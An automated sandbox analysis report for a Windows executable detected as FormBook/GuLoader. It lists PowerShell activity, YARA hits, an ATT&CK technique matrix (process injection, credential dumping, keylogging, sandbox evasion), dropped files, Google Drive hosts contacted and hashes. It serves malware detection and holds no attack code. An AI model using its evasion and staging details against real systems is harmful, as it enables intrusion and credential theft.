Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\iwEnYIOol8.exe

0_2_00403532

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match

File source: 0000000B.00000002.2276925695.0000000020DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match

File source: 0000000B.00000002.2276925695.0000000020DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	211 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	411 Process Injection	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	411 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	114 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
iwEnYIOol8.exe	55%	ReversingLabs	Win32.Trojan.Powload
iwEnYIOol8.exe	71%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	55%	ReversingLabs	Win32.Trojan.Powload
C:\Users\user\AppData\Local\Temp\nsjDF7A.tmp\nsExec.dll	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://www.microsoft.cwT	0%	Avira URL Cloud	safe
http://www.microsoft.)U	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	172.217.16.142	true	false		high
drive.usercontent.google.com	216.58.206.33	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1902213888.0000000006057000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000002.00000002.1895859643.0000000005146000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.cwT	powershell.exe, 00000002.00000002.1914735082.00000000089E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.1895859643.0000000005146000.00000004.00000800.00020000.00000000.sdmp	false		high
https://translate.google.com/translate_a/element.js	Bldtvandsfiltrene166.exe, 0000000B.00000003.2000703421.0000000005358000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2000607225.0000000005358000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.1895859643.0000000005146000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.1895859643.0000000005146000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000002.00000002.1902213888.0000000006057000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.1902213888.0000000006057000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ftp.ftp://ftp.gopher.	Bldtvandsfiltrene166.exe, 0000000B.00000001.1894149943.0000000000649000.00000020.00000001.01000000.00000008.sdmp	false		high
https://drive.usercontent.google.com/	Bldtvandsfiltrene166.exe, 0000000B.00000003.2188352590.0000000005347000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000002.2245387778.000000000534E000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2040484830.000000000534E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	iwEnYIOol8.exe, Bldtvandsfiltrene166.exe.2.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.1895859643.0000000005146000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	Bldtvandsfiltrene166.exe, 0000000B.00000003.2000703421.0000000005358000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2000607225.0000000005358000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	Bldtvandsfiltrene166.exe, 0000000B.00000001.1894149943.00000000005F2000.00000020.00000001.01000000.00000008.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.1895859643.0000000004FF1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/	Bldtvandsfiltrene166.exe, 0000000B.00000002.2244935667.00000000052E8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.1895859643.0000000005146000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000002.00000002.1902213888.0000000006057000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1902213888.0000000006057000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.)U	powershell.exe, 00000002.00000002.1914735082.00000000089E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	Bldtvandsfiltrene166.exe, 0000000B.00000001.1894149943.0000000000649000.00000020.00000001.01000000.00000008.sdmp	false		high
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	Bldtvandsfiltrene166.exe, 0000000B.00000001.1894149943.00000000005F2000.00000020.00000001.01000000.00000008.sdmp	false		high
https://apis.google.com	Bldtvandsfiltrene166.exe, 0000000B.00000003.2000703421.0000000005358000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2000607225.0000000005358000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1895859643.0000000004FF1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
216.58.206.33	drive.usercontent.google.com	United States		15169	GOOGLEUS	false
172.217.16.142	drive.google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588748
Start date and time:	2025-01-11 04:58:48 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	iwEnYIOol8.exe renamed because original name is a hash value
Original Sample Name:	8944de6ca208c12dc7086ae70fc0375635bea9ae1b671fb1e54885f8b51b9c87.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/13@2/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 94% Number of executed functions: 96 Number of non-executed functions: 307
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 5832 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:53:45	API Interceptor	3x Sleep call for process: Bldtvandsfiltrene166.exe modified
22:59:44	API Interceptor	30x Sleep call for process: powershell.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Ntwph4urc1.exe	Get hash	malicious	FormBook, GuLoader	Browse	216.58.206.33 172.217.16.142
	2976587-987347589.07.exe	Get hash	malicious	Nitol, Xmrig	Browse	216.58.206.33 172.217.16.142
	2976587-987347589.08.exe	Get hash	malicious	Nitol	Browse	216.58.206.33 172.217.16.142
	Ntwph4urc1.exe	Get hash	malicious	FormBook, GuLoader	Browse	216.58.206.33 172.217.16.142
	2976587-987347589.08.exe	Get hash	malicious	Unknown	Browse	216.58.206.33 172.217.16.142
	yMXFgPOdf2.exe	Get hash	malicious	GuLoader	Browse	216.58.206.33 172.217.16.142
	2976587-987347589.07.exe	Get hash	malicious	Unknown	Browse	216.58.206.33 172.217.16.142
	yMXFgPOdf2.exe	Get hash	malicious	GuLoader	Browse	216.58.206.33 172.217.16.142
	02Eh1ah35H.exe	Get hash	malicious	FormBook, GuLoader	Browse	216.58.206.33 172.217.16.142
	LMSxhK1u8Z.exe	Get hash	malicious	GuLoader	Browse	216.58.206.33 172.217.16.142

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsjDF7A.tmp\nsExec.dll	678763_PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Shipping documents 000022999878999800009999.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Ze1Ueabtx5.img	Get hash	malicious	AgentTesla, GuLoader	Browse
	Documenti di spedizione 0009333000459595995.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	4hIPvzV6a2.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe	Get hash	malicious	Unknown	Browse
	3Dut8dFCwD.exe	Get hash	malicious	Unknown	Browse
	Ms63nDrOBa.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
